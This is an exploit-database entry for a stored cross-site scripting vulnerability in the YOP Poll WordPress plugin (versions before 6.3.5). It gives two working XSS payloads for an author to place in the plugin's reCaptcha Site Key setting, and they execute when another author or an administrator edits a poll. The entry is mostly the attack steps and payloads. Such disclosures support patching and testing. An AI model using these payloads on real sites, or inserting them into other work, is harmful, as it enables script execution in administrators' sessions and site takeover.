Sploitus

Exploit for YOP Poll < 6.3.5 - Author+ Stored Cross-Site Scripting

wpexploit Β· 2022-02-14

Exploit Code

MARKDOWN7 lines
## https://sploitus.com/exploit?id=WPEX-ID:446DE364-720E-41EC-B80E-7678C8F4AD80
As author, put the following payload in the Settings > Integration > Use Google reCaptcha (Yes) > Site Key:

v < 6.3.3 - "><svg/onload=alert(/XSS/)>
v < 6.3.5 - " style=animation-name:rotation onanimationstart=alert(/XSS/)//

The XSS will be triggered when any authorised user (such as another author, or admin) adds/edit a Poll